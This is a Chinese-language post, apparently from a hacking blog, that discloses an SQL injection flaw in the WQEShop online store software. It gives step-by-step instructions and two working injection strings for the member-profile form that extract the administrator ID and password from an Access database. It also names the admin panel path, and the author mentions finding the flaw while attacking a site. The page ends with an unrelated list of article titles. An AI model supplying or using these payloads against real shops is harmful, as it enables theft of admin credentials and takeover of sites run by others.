網奇EShop網上商城系統,注射漏洞
官網:http://www.wqeshop.com/
也不曉得用的人多不多..上次搞站的時候..不小心盲注出來的.
具體看過程...
註冊個用戶,
進入會員中心,點擊“會員信息”頁面進行信息修改
在表單的任何一項中都可以進入暴數據操作
暴管理員ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + '
暴管理員密碼:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1'))
紅色的"1"字代表上一步暴出來的管理員ID
後臺地址:web+/admin/
上面的方法得針對ACCESS的...當然如果是SQL的....啥都不用說了...大家都懂的.
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
kafka更新元數據失敗問題研究
原創
2024-04-24 23:18:37
得物 ZooKeeper SLA 也可以 99.99%丨最佳實踐
原創
2024-04-22 21:12:04
體驗AI驅動的軟件開發 | 普元低代碼社區版安裝流程
原創
2024-04-17 23:44:17
搶先體驗:Zabbix 7.0全新Dashboard和MFA功能,增強可視化、安全性、靈活性!
原創
2024-04-17 22:13:12
【安裝部署】Apache SeaTunnel 和 Web快速安裝詳解
原創
2024-04-16 12:22:36
用海豚調度器定時調度從Kafka到HDFS的kettle任務腳本
原創
2024-04-15 21:18:44
無用代碼掃描組件設計
原創
2024-04-10 23:16:46
從MongoDB GridFS下載文件到本地
原創
2024-04-10 22:13:54
《幻獸帕魯》解鎖基地和工作帕魯數量上限
原創
2024-04-07 21:14:36
Notion 開源替代品 AFFINE 部署和使用教程
原創
2024-04-07 21:14:35
在 kubernetes 環境下如何優雅擴縮容 Pulsar
原創
2024-03-29 12:22:15
基於vite多頁面實現多端同構開發和部署
原創
2024-03-28 00:34:49
如何用Flask中的Blueprints構建大型Web應用
原創
2024-03-27 11:15:44
arthas火焰圖async-profiler在雲交易中的運用
原創
2024-03-12 12:06:25